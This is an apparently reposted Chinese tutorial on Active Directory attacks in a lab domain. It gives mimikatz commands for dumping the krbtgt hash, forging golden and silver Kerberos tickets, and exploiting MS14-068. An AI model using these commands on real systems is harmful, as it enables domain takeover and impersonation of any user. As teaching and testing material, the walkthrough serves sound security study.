当前位置:首页 > 每日看点 > 正文内容

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?

卡卷网12个月前 (04-04)每日看点195

kerberos协议访问请求图

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第1张

黄金票据

原理

黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

黄金票据的条件要求

1.域名称 test.com

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第2张

2.域的SID 值 S-1-5-21-3911998785-1923830468-1006530692(后一段就是机器编号了,不需要)

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第3张

3.域的KRBTGT账户NTLM密码哈希或者aes-256值

lsadump::dcsync /domain:test.com /user:krbtgt

4fbcddb2c382d2ff788e6b88bc6685f4

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第4张

4.伪造用户名 administrator

获得以上信息后就可以伪造票据了

删除现有的票据

klist purge

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第5张

klist 查看当前票据

没有票据时无法访问 dc

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第6张

伪造票据信息

kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /krbtgt:4fbcddb2c382d2ff788e6b88bc6685f4 /ptt

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第7张

之后可以访问

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第8张

白银票据

原理

白银票据是伪造st(门票),这样的好处是门票不会经过kdc,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),dns等等

白银票据的条件要求

1.域全名 WIN-OM48SNJFGAL.test.com

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第9张

2.域sid S-1-5-21-3911998785-1923830468-1006530692(后一段就是机器编号了,不需要)

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第10张

3.目标服务器FQDN WIN-OM48SNJFGAL.test.com

4.可利用的服务cifs

5.服务账号的NTML HASH 3a54b6e5168227fc55575efb4c2f21aa(一定要是带$的共享账号)

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第11张

6.需要伪造的用户名test

伪造票据信息

kerberos::golden /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /target:WIN-OM48SNJFGAL.test.com /service:cifs /rc4:3a54b6e5168227fc55575efb4c2f21aa /user:aaa /ptt

初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第12张


ms14-068

原理

ms14068的漏洞原理是伪造域管的tgt

ms14-068利用条件

ms14-068是不需要hash的值,只需要普通域用户的账号和密码即可.还有对应的用户sid值,但是有一个前提就是补丁没有打才可以使用

域用户账号和密码

对应用户*sid*值

域全名

MS14-068.exe -u aaa@test.com -p admin@123 -s S-1-5-21-3911998785-1923830468-1006530692 -d WIN-OM48SNJFGAL.test.com

导入生成的票据

kerberos::ptc TGT_aaa@test.com.ccache


初学内网渗透的一些问题,有大佬可以帮我解答一下吗?  第13张

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/04/12255.html

分享给朋友:

相关文章

手机的运行内存真的有必要上16GB吗?

全是国产垃圾APP惯出来的。那些对国产软件没意见的人,建议出国看看,花不了多少钱,出门开 Google Map,订宾馆用 Booking,翻译用 Google translate,聊天用 Telegram,社交活动用 Discord,你会惊...

抖音和快手最大的区别是什么?

1、目标人群定位不同抖音:一二线城市,占比52%,大专学历以上,女性偏多。抖音以年轻群体居多。快手:三四线城市,占比64%,高中学历以下,男女更均衡。快手所覆盖的年龄段范围更广。2、内容创作的形式和深度不同抖音:偏深层,内容的装饰及表达更高...

Redmi 为什么可以把性价比做得那么高?

一位修手机的老大哥曾经跟我说过,红米1那个手机,除了处理器还凑活,其余零部件,就是市面上山寨机那种。其实红米性价比并不算极致,而且一直都有竞争者,从原来的群魔乱舞,到后来的荣耀,魅蓝,一加,再到现在的IQOO和realme。红米的方法也很简...

为什么闲鱼越做越差?

理想的闲鱼:卖家视角:4000块钱买的手机,用了半年不想用了,挂一个3000块,和买家一顿交流,最后2500块成交,我得到了回血,买家得到了便宜;买家视角:想用一台4000块的手机,但是手里只有2500块,来到闲鱼和卖家一顿交流,最后250...

你见过哪些有趣的偏微分方程组?

你见过哪些有趣的偏微分方程组?

说说我一直在做的一个偏微分方程系统吧,该模型为生物领域的趋化性(chemotaxis)模型,也叫Keller-Segel模型,由该二人于1971年左右提出,用于刻画细胞或者细菌的趋化机制。解释一下趋化性(chemotaxis):趋化性是指单...

本专业是电气的,请问入门plc 必须要从电工接线开始吗,我怕被公司骗了,想请教各位?

本专业是电气的,请问入门plc 必须要从电工接线开始吗,我怕被公司骗了,想请教各位?

开关接线图PART 01一开单控开关接线图二三开连体单控开关接线图四开连体单控开关接线图一开五孔单控插座接线图二开五孔单控插座接线图一开双控开关接线图二三开单控开关接线图四开单控开关接线图一开五孔单控插座接线图二三开双控开关接线图一开多控开...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。